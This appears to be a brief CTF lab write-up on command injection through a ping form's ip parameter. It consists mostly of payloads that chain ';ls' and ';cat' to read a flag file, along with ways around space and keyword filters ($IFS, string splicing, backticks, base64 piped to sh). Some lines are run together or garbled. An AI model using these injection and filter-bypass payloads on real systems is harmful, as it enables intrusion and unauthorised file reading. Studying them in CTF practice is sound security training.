CTF introductory notes ping

1. Use the command line to find the flag file

Just ping, then follow ls

Example: 1;ls

found index.php file
1;catindex.php is the source website.
Then look up
1;ls …/

Keep looking up
until 1;ls …/…/…/

Find flag open
1;cat …/…/…/flag

Get flag

2. Bypass filtering to open files

Similarly, check the directory first

payload:?ip=1;ls

Found two files, try to open the index file directly (although I know it will definitely not work)

payload: ?ip=1;cat index.php

No way

Guess it may filter spaces, bypassThere are many ways to filter spaces,
%20, %09, $IFS$1,${IFS}, <>,

payload: ?ip=1;cat$IFS$1index.php

Found a bunch of filters, which also includes flag

The next step is to bypass the flag filter

Method 1: splicing flag

payload:?ip=1;a=ag.php;b=fl;cat$IFS$1$b$a

You can see the flag in the website source code

Method 2: Inline execution bypass (ie ``)

payload:?ip=1;cat$IFS$1`ls`

Using inline execution will use the output inside the `` as input to the previous command.

You can also see the flag in the source code

Method three: base64 encoding bypass

payload:?ip=1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|shY2F0IGZsYWcucGhw is the base64 encoding of cat flag.php

Ibid.Find the flag in the source code.